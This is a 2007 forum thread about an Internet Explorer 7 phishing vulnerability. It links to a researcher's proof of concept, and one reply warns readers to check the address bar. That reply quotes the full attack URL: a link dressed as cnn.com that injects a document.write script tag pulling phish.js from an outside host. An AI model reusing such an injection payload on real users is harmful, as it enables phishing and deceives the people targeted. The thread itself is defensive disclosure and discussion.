IE7 Phishing Hole Info and Proof of Concept released

Discussion in 'Windows Vista Security' started by Steve, Mar 15, 2007.

  1. Steve

    Steve Guest

    A vulnerability has been found in IE7 that would allow a Phishing site
    to be displayed on a users screen...

    The user has provied proof if concept code that can show you the
    problem in action.

    "Phishing using IE7 local resource vulnerability" at 'Aviv Raff On .NET
    - Phishing using IE7 local resource vulnerability'
    (http://tinyurl.com/29mbtf)
     
    Steve, Mar 15, 2007
    #1
    1. Advertisements

  2. Steve

    Robert Firth Guest

    Read what is in the address bar! Of course, they could make the link long
    enough that you don't see what else is in the field.

    http://www.cnn.com/dateandtime/andsomeotherpadding/tomakethislookslike/alegitimatelink.html?");document.write('<script%20src=\'http://www.raffon.net/research/ms/ie/navcancl/phish.js\'></script>');//

    ^ Doesn't look like what should normally be in the address bar if you go to
    cnn.com. Too much javascript.

    --
    /* * * * * * * * * * * * * * * * * *
    * Robert Firth *
    * Windows Vista x86 RTM *
    * http://www.WinVistaInfo.org *
    * * * * * * * * * * * * * * * * * */
     
    Robert Firth, Mar 15, 2007
    #2
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.